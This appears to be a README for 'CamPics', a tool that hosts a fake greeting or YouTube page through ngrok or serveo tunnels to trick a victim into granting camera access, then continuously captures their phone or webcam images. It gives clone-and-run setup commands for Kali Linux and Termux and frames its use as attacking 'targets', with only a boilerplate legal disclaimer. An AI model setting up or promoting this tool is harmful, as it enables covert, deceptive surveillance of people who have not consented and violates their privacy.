CamPics take shots from target's phone front camera or PC webcam just sending a link.
CamPics is process to grab camera shots of target's phone front camera or PC webcam. You can trape target wishing EID or Youtube Video. CamPics repository Hosts a fake website using ngrok & serveo server to generate a link. You need to forward the link to the target. After sending the link victim will asked for camera permission and if the target allows it, this tool will grab front camera shots continuously of targeted device.
Usage of CamPics for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.
- Kali Linux
- Termux
- Perrot Sec OS
This tool requires PHP for webserver, SSH or serveo link. First run following command on your terminal
apt-get -y install php openssh git wget
git clone https://github.com/TechEthical/CamPics
cd CamPics
bash campics.sh
pkg install git
pkg install wget
pkg install php
pkg install openssh
git clone https://github.com/TechEthical/CamPics.git
cd CamPics
bash campics.sh
Note: Use Mobile Data For Ngrok Link
CamPics is inspired from Anil Parashar